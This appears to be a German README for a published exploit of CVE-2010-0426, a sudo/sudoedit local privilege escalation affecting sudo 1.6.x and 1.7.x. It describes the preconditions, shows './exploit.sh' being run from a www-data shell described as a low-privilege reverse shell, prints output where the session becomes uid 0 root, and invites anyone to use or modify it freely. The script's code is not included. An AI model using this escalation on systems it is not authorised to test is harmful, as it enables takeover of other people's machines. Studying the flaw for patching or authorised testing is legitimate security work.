
sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 - Privilegieneskalation mit sudo und sudoedit
https://www.cvedetails.com/cve/CVE-2010-0426/
sudo 1.6.x vor 1.6.9p21 und 1.7.x vor 1.7.2p4 erlaubt, wenn ein Pseudo-Befehl aktiviert ist, eine Übereinstimmung zwischen dem Namen des Pseudo-Befehls und dem Namen einer ausführbaren Datei in einem beliebigen Verzeichnis, was es lokalen Benutzern ermöglicht, durch eine manipulierte ausführbare Datei Privilegien zu erlangen, wie durch eine Datei namens sudoedit im Home-Verzeichnis eines Benutzers demonstriert wird.
Rechte eskalieren, wenn die sudoedit-Binärdatei suid-Berechtigung hat und eine Datei als sudo bearbeitet werden kann (überprüfen mit sudo -l)
./exploit.sh
Eskalation zu root von einer Low-Priv-Reverse-Shell
www-data@g1vi:/var/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@g1vi:/var/tmp$ ./exploit.sh
[+] Target is vulnerable
[+] Running stuff...
root@g1vi:/var/tmp$ id
uid=0(root) gid=0(root) groups=0(root)
Fühle dich frei, es zu verwenden oder zu modifizieren, wann und wo immer du möchtest.